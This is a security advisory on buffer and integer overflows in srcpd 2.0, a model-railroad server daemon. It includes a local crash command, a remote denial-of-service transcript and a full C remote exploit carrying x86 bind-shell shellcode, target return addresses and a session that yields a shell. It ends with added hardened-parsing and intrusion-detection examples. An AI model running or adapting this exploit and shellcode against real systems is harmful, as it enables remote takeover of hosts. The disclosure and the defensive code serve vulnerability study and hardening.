/***********************************************
 *
 * m00 security advisory #001
 *
 * Buffer overflows in Srcpd v2.0
 *
 * www.m00security.org
 *
 * overg[at]mail.ru h0snp[at]mail.ru
 *
 ************************************************/

---------------------------------------
Product: srcpd
Version: 2.0 (others?)
OffSite: http://srcpd.sourceforge.net
Problem: buffer & integer overflows.
---------------------------------------

Vulnerable file: /usr/sbin/srcpd

Description of the package:

The srcpd is a server daemon that enables you to control and play with a
digital model railroad using any SRCP client. Actually it supports an
Intellibox (tm), a Marklin Interface 6050 or 6051 (tm?), and many more
interfaces. More information about SRCP and links to many really cool
clients (and other servers for different hardware) can be found at
http://srcpd.sourceforge.net and http://www.der-moba.de/Digital
This is a beta release, do not use for production!

SRCP - Simple Railroad Command Protocol.

1. Local buffer overflow.

In srcpd.c the 'conffile' buffer is MAXPATHLEN bytes long. An -f argument
longer than MAXPATHLEN overflows it and crashes srcpd. Being an argv
overflow, it needs local access to start srcpd with attacker-chosen
arguments:

[over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 1197)]
0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6

2. Remote integer overflow.

Sending GO a second time on the same connection closes it, and afterwards
srcpd no longer accepts connections on its port at all (denial of service):

[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
srcpd V2; SRCP 0.8.2
go 11111111
1060333759.411 200 OK GO 1
go 11111111
Connection closed by foreign host.
[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused

3. Remote stack overflow / command execution.

There are multiple stack overflow vulnerabilities in the method handlers,
for example handleSET(), handleGET() and others.
Therefore we can smash the stack and get a shell. See the code for more
info. The remote exploit is attached (m00-srcpd.c, below): after opening a
session with GO it sends one 220-byte SET request whose argument list is
the return address repeated rep times, a space, and a bind shell listening
on TCP port 26112. The shell runs with the privileges of the srcpd process,
here the user who started it.

Example:

[h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0
 ** ***************************************** **
 ** Srcpd v2.0 remote exploit by m00 Security **
 ** ***************************************** **
 Conneting...OK
 using RET = 0xbf1fcb61
 now, if you was lucky with ret, shell spawned on 26112.
[h0snp@h0m3 srcpd]$ telnet localhost 26112
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)

(c) m00 Security / Over_G & h0snp

---------------------------------------
Attachment: m00-srcpd.c (decoded from the base64 MIME part)
---------------------------------------

/*
 *    m00 Security
 * www.m00security.org
 * srcpd  =< 2.0 remote exploit
 *
 * Audited by h0snp && Over_G.
 * Programmed by h0snp.
 * 2003.
 * ----------
 * Contact: #m00 at irc.wom.ru
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>

#define NOP 0x90
#define RET 0xbf1fcb61

/* Resolve a dotted quad or a host name to a network-order IPv4 address; 0 on failure. */
in_addr_t resolve(const char *host)
{
    struct hostent *he;
    in_addr_t a = inet_addr(host);

    if (a == INADDR_NONE) {
        he = gethostbyname(host);
        if (!he) return 0;
        memcpy(&a, he->h_addr, sizeof a);
    }
    return a;
}

/* TCP-connect to address:port; returns the socket or a negative error code. */
int make_connect(const char *address, unsigned short port)
{
    int sock;
    in_addr_t a;
    struct sockaddr_in peer;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) return -1;
    if (!(a = resolve(address))) { close(sock); return -2; }
    memset(&peer, 0, sizeof peer);
    peer.sin_family = AF_INET;
    peer.sin_addr.s_addr = a;
    peer.sin_port = htons(port);
    if (connect(sock, (struct sockaddr *)&peer, sizeof peer) == 0) return sock;
    close(sock);
    return -3;
}

/* Linux/x86 bind shell on TCP port 26112 (0x6600), all calls via socketcall(). */
unsigned char scode[] =
    /* socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x1\x51\xb1\x6\x51\xb1\x1"
    "\x51\xb1\x2\x51\x8d\xc\x24\xcd\x80"
    /* bind(fd, {AF_INET, port 0x6600, INADDR_ANY}, 16). The attached file has
     * "\b3" here, a C backspace escape; the intended byte is 0xb3 (mov bl,2). */
    "\xb3\x2\xb1\x2\x31\xc9\x51\x51\x51\x80"
    "\xc1\x66\x66\x51\xb1\x2\x66\x51\x8d\xc\x24\xb2\x10\x52\x51\x50\x8d\xc\x24"
    "\x89\xc2\x31\xc0\xb0\x66\xcd\x80"
    /* listen(fd, 1) */
    "\xb3\x1\x53\x52\x8d\xc\x24\x31\xc0\xb0\x66"
    "\x80\xc3\x3\xcd\x80"
    /* accept(fd, NULL, NULL) */
    "\x31\xc0\x50\x50\x52\x8d\xc\x24\xb3\x5\xb0\x66\xcd\x80"
    /* dup2(client, 0); dup2(client, 1) */
    "\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80"
    /* execve("//bin/sh", ["//bin/sh", NULL], envp); exit() */
    "\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x8"
    "\x31\xc9\x51\x53\x8d\xc\x24\x31\xc0\xb0\xb\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

#define SCODELEN (sizeof(scode) - 1)   /* the attachment hard-coded 148 and cut the last byte */

struct target {
    const char *type;
    unsigned long ret;   /* address written over the saved return address */
    unsigned int rep;    /* how many times it is repeated in the SET line */
} targets[] = {
    { "Red Hat Linux 9.0 x86 srcpd 2.0 (build gcc 3.2.2)", RET,        13 },
    { "Red Hat Linux 9.0 x86 srcpd 2.0 (from rpm)",        0xbf1fcba1,  6 },
    { "Red Hat Linux 7.3 x86 srcpd 2.0 (from rpm)",        0x42931b51,  6 },
};
#define NTARGETS (sizeof(targets) / sizeof(targets[0]))

void usage(const char *name)
{
    unsigned int i;

    printf("\rSrcpd v2.0 remote exploit by m00 Security\n");
    printf("usage: %s -h <host> -p <port> -t <target> [-o <offset>] \n", name);
    printf("available targets:\n");
    for (i = 0; i < NTARGETS; i++)
        printf(" %3u / 0x%.8lx / %s \n", i, targets[i].ret, targets[i].type);
    exit(0);
}

int main(int argc, char *argv[])
{
    char *host = NULL, *buf, *rcvbuf;
    unsigned long ret;
    uint32_t r;
    long offset = 0;
    unsigned int rep, i;
    int opt, port = 12340, sock, pos, trgt = 0;

    if (argc < 4) usage(argv[0]);
    while ((opt = getopt(argc, argv, "h:p:o:t:")) != -1)
        switch (opt) {
        case 'h': host = optarg; break;
        case 'p': port = atoi(optarg); break;
        case 'o': offset = atol(optarg); break;   /* subtracted from the target's RET */
        case 't': trgt = atoi(optarg); break;
        default:  usage(argv[0]);
        }
    if (!host || trgt < 0 || (unsigned int)trgt >= NTARGETS) usage(argv[0]);

    printf(" ** ***************************************** **\n");
    printf(" ** Srcpd v2.0 remote exploit by m00 Security **\n");
    printf(" ** ***************************************** **\n");
    printf(" Conneting...");
    if ((sock = make_connect(host, port)) < 0) {
        perror(" connect()");
        exit(-1);
    }
    /* the attachment applied -o before this assignment, so it never took effect */
    ret = targets[trgt].ret - offset;
    rep = targets[trgt].rep;
    printf("OK\n using RET = 0x%lx\n", ret);

    buf    = malloc(220);
    rcvbuf = malloc(512);
    if (!buf || !rcvbuf) return -1;

    /* banner, e.g. "srcpd V2; SRCP 0.8.2" */
    pos = recv(sock, rcvbuf, 512, 0);
    printf(" Sending...");
    if (pos <= 0) return -1;
    /* open an SRCP session first, as in the section 2 transcript */
    send(sock, "go 11111\r\n", 10, 0);
    pos = recv(sock, rcvbuf, 512, 0);
    if (pos <= 0) return -1;

    /* Line layout: "set 1 lock " | rep x RET | ' ' | shellcode | NOP fill | NUL.
     * All 220 bytes are initialised; the attachment only filled the first 200. */
    memset(buf, NOP, 220);
    memcpy(buf, "set 1 lock ", 11);
    r = (uint32_t)ret;                    /* little-endian, as the x86 target reads it */
    for (i = 0; i < rep; i++)
        memcpy(buf + 11 + i * 4, &r, 4);
    buf[11 + rep * 4] = ' ';
    memcpy(buf + 12 + rep * 4, scode, SCODELEN);
    buf[219] = '\0';
    printf("OK\n");
    send(sock, buf, 220, 0);
    printf(" now, if you was lucky with ret, shell spawned on 26112.\n");

    free(buf);
    free(rcvbuf);
    close(sock);
    return 0;
}
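Neither the conffile copy from section 1 nor the SET/GET handlers from section 3 are shown in the advisory, so the following is an added example, not srcpd code and not the authors' exploit: both overflow patterns as they are typically written, each beside a bounded replacement that measures the input before copying it. The buffer sizes, the "set <bus> <devicegroup> <args>" field layout (taken from the exploit's "set 1 lock ..." line), the function names and the sample inputs are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/param.h>

#ifndef MAXPATHLEN
#define MAXPATHLEN 4096          /* assumed if the platform does not define it */
#endif

/* Section 1, vulnerable pattern (illustration only, never call it with
 * untrusted input): the -f argument is copied into a MAXPATHLEN buffer
 * with no length check, so a longer argument runs off the end of it. */
void unsafe_set_conffile(char conffile[MAXPATHLEN], const char *arg)
{
    strcpy(conffile, arg);
}

/* Hardened form: refuse anything that does not fit together with its NUL. */
int safe_set_conffile(char *conffile, size_t size, const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= size)
        return -1;               /* caller prints usage and exits */
    memcpy(conffile, arg, n + 1);
    return 0;
}

/* Section 3: a SET request split into fixed-size fields (sizes assumed). */
struct set_request {
    unsigned bus;
    char group[16];
    char args[64];
};

/* Vulnerable pattern (illustration only): %s has no width, so an overlong
 * group or argument list overwrites whatever follows the arrays. */
void unsafe_parse_set(struct set_request *r, const char *line)
{
    sscanf(line, "set %u %s %[^\r\n]", &r->bus, r->group, r->args);
}

/* Copy one token into a fixed array, rejecting empty or oversize tokens. */
static int copy_field(char *dst, size_t dstsize, const char *src, size_t len)
{
    if (len == 0 || len >= dstsize)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Hardened form: every field is measured before it is copied. Returns 0,
 * or a negative code naming the field that was malformed or too long. */
int safe_parse_set(struct set_request *r, const char *line)
{
    const char *p = line;
    char bus[11];
    size_t n;

    memset(r, 0, sizeof *r);
    n = strcspn(p, " \r\n");
    if (n != 3 || strncasecmp(p, "set", 3) != 0)
        return -1;                                 /* not a SET */
    p += n + strspn(p + n, " ");

    n = strcspn(p, " \r\n");
    if (copy_field(bus, sizeof bus, p, n) < 0 || strspn(bus, "0123456789") != n)
        return -2;                                 /* bus is not a small number */
    r->bus = (unsigned)strtoul(bus, NULL, 10);
    p += n + strspn(p + n, " ");

    n = strcspn(p, " \r\n");
    if (copy_field(r->group, sizeof r->group, p, n) < 0)
        return -3;                                 /* device group too long */
    p += n + strspn(p + n, " ");

    n = strcspn(p, "\r\n");
    if (copy_field(r->args, sizeof r->args, p, n) < 0)
        return -4;                                 /* argument list too long */
    return 0;
}

/* The section 1 input: perl -e 'print "A" x 10000' as the -f argument. */
int demo_overlong_conffile(void)
{
    char conffile[MAXPATHLEN];
    char *arg = malloc(10001);
    int rc;
    memset(arg, 'A', 10000);
    arg[10000] = '\0';
    rc = safe_set_conffile(conffile, sizeof conffile, arg);
    free(arg);
    return rc;
}

/* A 220-byte SET line shaped like the exploit's: "set 1 lock " plus filler. */
int demo_overlong_set(void)
{
    struct set_request r;
    char line[221];
    memset(line, 'A', 220);
    memcpy(line, "set 1 lock ", 11);
    line[220] = '\0';
    return safe_parse_set(&r, line);
}

int main(void)
{
    struct set_request r;
    printf("overlong -f argument: %d\n", demo_overlong_conffile());
    printf("overlong SET line:    %d\n", demo_overlong_set());
    printf("well-formed SET:      %d\n", safe_parse_set(&r, "set 1 lock 3 1\r\n"));
    return 0;
}
```

The point of copy_field() is that the length check happens on the source token, before any byte lands in the fixed array; a width-limited sscanf ("%15s") would stop the overflow but silently truncate, so the handler would then act on a command it never fully read.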
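On the defensive side, as an added example that is likewise not from the advisory or the srcpd project: a per-connection classifier for SRCP request lines that flags the two remote triggers shown above, the second GO on one connection from section 2 and the long, binary, NOP-padded SET line the attached exploit sends. The 256-byte ceiling, the verdict names and the sample session (two GO lines as in the transcript, a benign request, a line shaped like the exploit's with RET 0xbf1fcb61 repeated six times, and an overlong plain-text line) are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum verdict { V_OK, V_SECOND_GO, V_OVERLONG, V_BINARY, V_NOP_SLED };

/* Per-connection state: an SRCP session is opened with one GO. */
struct conn_state { int go_seen; };

#define MAX_LINE 256   /* assumed ceiling; real SRCP requests are a few dozen bytes */

/* Classify one request line (CR/LF already stripped). */
enum verdict inspect_line(struct conn_state *st, const unsigned char *line, size_t len)
{
    size_t i, run = 0;
    int binary = 0;

    /* Section 2: the daemon died on the second "go" sent over one connection. */
    if (len >= 2 && strncasecmp((const char *)line, "go", 2) == 0 &&
        (len == 2 || line[2] == ' ')) {
        if (st->go_seen)
            return V_SECOND_GO;
        st->go_seen = 1;
    }
    /* Section 3: the exploit's SET line is 220 bytes, far beyond any real request. */
    if (len > MAX_LINE)
        return V_OVERLONG;
    for (i = 0; i < len; i++) {
        /* x86 NOP sled: the exploit pads the line with 0x90 */
        if (line[i] == 0x90) {
            if (++run >= 8)
                return V_NOP_SLED;
        } else {
            run = 0;
        }
        /* return addresses and shellcode are not printable protocol text */
        if (!isprint(line[i]) && line[i] != '\t')
            binary = 1;
    }
    return binary ? V_BINARY : V_OK;
}

/* Constructed session (see the lead-in). Fills `out` with one verdict per
 * line and returns how many of the five lines were flagged. */
int run_samples(enum verdict out[5])
{
    struct conn_state st = { 0 };
    unsigned char shaped[220], plain[300];
    const unsigned char ret[4] = { 0x61, 0xcb, 0x1f, 0xbf };   /* 0xbf1fcb61, little-endian */
    int i, flagged = 0;

    memset(shaped, 0x90, sizeof shaped);
    memcpy(shaped, "set 1 lock ", 11);
    for (i = 0; i < 6; i++)
        memcpy(shaped + 11 + i * 4, ret, 4);
    shaped[11 + 6 * 4] = ' ';

    memset(plain, 'A', sizeof plain);
    memcpy(plain, "set 1 lock ", 11);

    out[0] = inspect_line(&st, (const unsigned char *)"go 11111111", 11);
    out[1] = inspect_line(&st, (const unsigned char *)"go 11111111", 11);
    out[2] = inspect_line(&st, (const unsigned char *)"get 1 power", 11);
    out[3] = inspect_line(&st, shaped, sizeof shaped);
    out[4] = inspect_line(&st, plain, sizeof plain);
    for (i = 0; i < 5; i++)
        if (out[i] != V_OK)
            flagged++;
    return flagged;
}

int main(void)
{
    static const char *names[] = { "ok", "second GO", "overlong", "binary", "NOP sled" };
    enum verdict v[5];
    int i, n = run_samples(v);

    for (i = 0; i < 5; i++)
        printf("line %d: %s\n", i, names[v[i]]);
    printf("%d of 5 lines flagged\n", n);
    return 0;
}
```

The GO check has to be stateful because the first GO is exactly what every legitimate client sends; the other checks are stateless and apply to any line-oriented text protocol where a stack overflow has to be delivered as non-printable bytes inside what should be an ASCII command.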